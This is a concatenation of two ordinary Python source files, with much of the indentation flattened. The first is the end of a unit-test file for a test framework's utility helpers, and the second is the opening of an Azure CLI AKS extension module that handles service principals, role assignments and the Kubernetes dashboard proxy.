any_order=True)
def test_concurrent_exec_when_multiple_exceptions_generates_results(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
results = utils.concurrent_exec(fake_int, [
(1,),
('not_int1',),
('not_int2',),
(5435,),
])
self.assertEqual(len(results), 4)
self.assertIn(1, results)
self.assertIn(5435, results)
exceptions = [result for result in results if isinstance(result, Exception)]
self.assertEqual(len(exceptions), 2)
self.assertIsInstance(exceptions[0], ValueError)
self.assertIsInstance(exceptions[1], ValueError)
self.assertNotEqual(exceptions[0], exceptions[1])
def test_concurrent_exec_when_raising_exception_generates_results(self):
def adder(a, b):
return a + b
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)],
raise_on_exception=True)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_raising_exception_makes_all_calls(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
with self.assertRaisesRegex(RuntimeError, '.*not_int.*'):
_ = utils.concurrent_exec(fake_int, [
(1,),
('123',),
('not_int',),
(5435,),
],
raise_on_exception=True)
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('123'),
mock.call('not_int'),
mock.call(5435),
],
any_order=True)
def test_concurrent_exec_when_raising_multiple_exceptions_makes_all_calls(
self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
with self.assertRaisesRegex(
RuntimeError,
r'(?m).*(not_int1(.|\s)+not_int2|not_int2(.|\s)+not_int1).*'):
_ = utils.concurrent_exec(fake_int, [
(1,),
('not_int1',),
('not_int2',),
(5435,),
],
raise_on_exception=True)
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('not_int1'),
mock.call('not_int2'),
mock.call(5435),
],
any_order=True)
def test_create_dir(self):
new_path = os.path.join(self.tmp_dir, 'haha')
self.assertFalse(os.path.exists(new_path))
utils.create_dir(new_path)
self.assertTrue(os.path.exists(new_path))
def test_create_dir_already_exists(self):
self.assertTrue(os.path.exists(self.tmp_dir))
utils.create_dir(self.tmp_dir)
self.assertTrue(os.path.exists(self.tmp_dir))
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.is_adb_available', return_value=True)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports')
@mock.patch('portpicker.pick_unused_port', return_value=MOCK_AVAILABLE_PORT)
def test_get_available_port_positive(self, *_):
self.assertEqual(utils.get_available_host_port(), MOCK_AVAILABLE_PORT)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.is_adb_available', return_value=False)
@mock.patch('portpicker.pick_unused_port', return_value=MOCK_AVAILABLE_PORT)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports')
def test_get_available_port_positive_no_adb(self,
mock_list_occupied_adb_ports, *_):
self.assertEqual(utils.get_available_host_port(), MOCK_AVAILABLE_PORT)
mock_list_occupied_adb_ports.assert_not_called()
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.is_adb_available', return_value=True)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports',
return_value=[MOCK_AVAILABLE_PORT])
@mock.patch('portpicker.pick_unused_port', return_value=MOCK_AVAILABLE_PORT)
def test_get_available_port_negative(self, *_):
with self.assertRaisesRegex(utils.Error, 'Failed to find.* retries'):
utils.get_available_host_port()
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports')
def test_get_available_port_returns_free_port(self, _):
"""Verifies logic to pick a free port on the host.
Test checks we can bind to either an ipv4 or ipv6 socket on the port
returned by get_available_host_port.
"""
port = utils.get_available_host_port()
got_socket = False
for family in (socket.AF_INET, socket.AF_INET6):
try:
s = socket.socket(family, socket.SOCK_STREAM)
got_socket = True
break
except socket.error:
continue
self.assertTrue(got_socket)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
s.bind(('localhost', port))
finally:
s.close()
def test_load_file_to_base64_str_reads_bytes_file_as_base64_string(self):
tmp_file_path = os.path.join(self.tmp_dir, 'b64.bin')
expected_base64_encoding = u'SGVsbG93IHdvcmxkIQ=='
with io.open(tmp_file_path, 'wb') as f:
f.write(b'Hellow world!')
self.assertEqual(utils.load_file_to_base64_str(tmp_file_path),
expected_base64_encoding)
def test_load_file_to_base64_str_reads_text_file_as_base64_string(self):
tmp_file_path = os.path.join(self.tmp_dir, 'b64.bin')
expected_base64_encoding = u'SGVsbG93IHdvcmxkIQ=='
with io.open(tmp_file_path, 'w', encoding='utf-8') as f:
f.write(u'Hellow world!')
self.assertEqual(utils.load_file_to_base64_str(tmp_file_path),
expected_base64_encoding)
def test_load_file_to_base64_str_reads_unicode_file_as_base64_string(self):
tmp_file_path = os.path.join(self.tmp_dir, 'b64.bin')
expected_base64_encoding = u'6YCa'
with io.open(tmp_file_path, 'w', encoding='utf-8') as f:
f.write(u'\u901a')
self.assertEqual(utils.load_file_to_base64_str(tmp_file_path),
expected_base64_encoding)
def test_cli_cmd_to_string(self):
cmd = ['"adb"', 'a b', 'c//']
self.assertEqual(utils.cli_cmd_to_string(cmd), '\'"adb"\' \'a b\' c//')
cmd = 'adb -s meme do something ab_cd'
self.assertEqual(utils.cli_cmd_to_string(cmd), cmd)
def test_get_settable_properties(self):
class SomeClass:
regular_attr = 'regular_attr'
_foo = 'foo'
_bar = 'bar'
@property
def settable_prop(self):
return self._foo
@settable_prop.setter
def settable_prop(self, new_foo):
self._foo = new_foo
@property
def readonly_prop(self):
return self._bar
def func(self):
"""Func should not be considered as a settable prop."""
actual = utils.get_settable_properties(SomeClass)
self.assertEqual(actual, ['settable_prop'])
def test_find_subclasses_in_module_when_one_subclass(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
integration_test)
self.assertEqual(len(subclasses), 1)
self.assertEqual(subclasses[0], integration_test.IntegrationTest)
def test_find_subclasses_in_module_when_indirect_subclass(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
mock_instrumentation_test)
self.assertEqual(len(subclasses), 1)
self.assertEqual(subclasses[0],
mock_instrumentation_test.MockInstrumentationTest)
def test_find_subclasses_in_module_when_no_subclasses(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
mock_controller)
self.assertEqual(len(subclasses), 0)
def test_find_subclasses_in_module_when_multiple_subclasses(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
multiple_subclasses_module)
self.assertEqual(len(subclasses), 2)
self.assertIn(multiple_subclasses_module.Subclass1Test, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Test, subclasses)
def test_find_subclasses_in_module_when_multiple_base_classes(self):
subclasses = utils.find_subclasses_in_module(
[base_test.BaseTestClass, test_runner.TestRunner],
multiple_subclasses_module)
self.assertEqual(len(subclasses), 4)
self.assertIn(multiple_subclasses_module.Subclass1Test, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Test, subclasses)
self.assertIn(multiple_subclasses_module.Subclass1Runner, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Runner, subclasses)
def test_find_subclasses_in_module_when_only_some_base_classes_present(self):
subclasses = utils.find_subclasses_in_module(
[signals.TestSignal, test_runner.TestRunner],
multiple_subclasses_module)
self.assertEqual(len(subclasses), 2)
self.assertIn(multiple_subclasses_module.Subclass1Runner, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Runner, subclasses)
def test_find_subclass_in_module_when_one_subclass(self):
subclass = utils.find_subclass_in_module(base_test.BaseTestClass,
integration_test)
self.assertEqual(subclass, integration_test.IntegrationTest)
def test_find_subclass_in_module_when_indirect_subclass(self):
subclass = utils.find_subclass_in_module(base_test.BaseTestClass,
mock_instrumentation_test)
self.assertEqual(subclass,
mock_instrumentation_test.MockInstrumentationTest)
def test_find_subclass_in_module_when_no_subclasses(self):
with self.assertRaisesRegex(
ValueError, '.*Expected 1 subclass of BaseTestClass per module, found'
r' \[\].*'):
_ = utils.find_subclass_in_module(base_test.BaseTestClass,
mock_controller)
def test_find_subclass_in_module_when_multiple_subclasses(self):
with self.assertRaisesRegex(
ValueError, '.*Expected 1 subclass of BaseTestClass per module, found'
r' \[(\'Subclass1Test\', \'Subclass2Test\''
r'|\'Subclass2Test\', \'Subclass1Test\')\].*'):
_ = utils.find_subclass_in_module(base_test.BaseTestClass,
multiple_subclasses_module)
if __name__ == '__main__':
unittest.main()
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
from math import isnan
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceLinuxProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterWindowsProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceNetworkProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterServicePrincipalProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceSshConfiguration
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceSshPublicKey
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedCluster
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAADProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAddonProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAgentPoolProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import AgentPool
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceStorageProfileTypes
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterIdentity
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAPIServerAccessProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterSKU
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._helpers import _populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_PREFIX, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_SHARED, CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
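# Illustrative behaviour of which() (the path shown is an example, not guaranteed):
#   which('kubectl')       -> e.g. '/usr/local/bin/kubectl' when kubectl is on PATH
#   which('not-installed') -> None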
def wait_then_open(url):
"""
    Waits for a bit then opens a URL. Useful for waiting for a proxy to come up before opening the URL.
"""
    # Poll until the proxy answers (or give up after a few tries), then open the browser.
    for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
            break
        except URLError:
            time.sleep(1)
    webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
    t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
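# Illustrative example (values are placeholders) of the prefix produced above:
#   _get_default_dns_prefix('myAKS!cluster', 'my-rg', '8ecadfc9-d1a3-4ea4-b844-0d9f87e4d7c8')
#   -> 'myAKSclust-my-rg-8ecadf'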
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
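# For reference, the acsServicePrincipal.json file written by store_acs_service_principal
# above is keyed by subscription id; the values shown here are placeholders:
#   {
#       "<subscription-id>": {
#           "client_secret": "<secret>",
#           "service_principal": "<app-id>"
#       }
#   }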
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.mgmt.resource.resources import ResourceManagementClient
from azure.mgmt.resource.resources.models import DeploymentProperties
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceManagementClient, subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
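# Illustrative scopes returned by _build_role_scope (subscription id and names are placeholders):
#   _build_role_scope(None, None, '0000')               -> '/subscriptions/0000'
#   _build_role_scope('my-rg', None, '0000')            -> '/subscriptions/0000/resourceGroups/my-rg'
#   _build_role_scope(None, '/custom/scope', '0000')    -> '/custom/scope' (passed through unchanged)
#   _build_role_scope('my-rg', '/custom/scope', '0000') -> raises CLIError (resource group is redundant)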
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd, # pylint: disable=too-many-statements
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
addon_profile = addon_profiles.get("kubeDashboard", ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
            if err.output.find(b'unknown flag: --address') != -1:
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
            requests.post('http://localhost:8888/closeport/{0}'.format(listen_port))
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
('omsagent' in result.addon_profiles) and
(hasattr(result.addon_profiles['omsagent'], 'identity')) and
(hasattr(result.addon_profiles['omsagent'].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
